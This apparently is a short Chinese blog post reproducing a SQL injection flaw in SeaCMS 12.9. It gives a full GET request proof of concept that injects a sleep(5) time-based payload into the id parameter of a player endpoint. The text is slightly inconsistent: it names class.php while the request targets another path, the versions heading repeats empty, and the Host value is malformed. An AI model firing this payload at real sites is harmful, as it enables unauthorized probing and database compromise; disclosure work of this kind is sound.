0x01漏洞介绍
SeaCMS是一套使用PHP编写的免费、开源的网站内容管理系统。该系统主要被设计用来管理视频点播资源。
SeaCMS 12.9版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许未经身份验证的远程攻击者执行任意代码并通过class.php中的id参数获取敏感信息。
0x02影响版本
0x02影响版本
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: 127.0.1.
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
延时注入 5秒
3.nuclei工具测试(漏洞存在)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容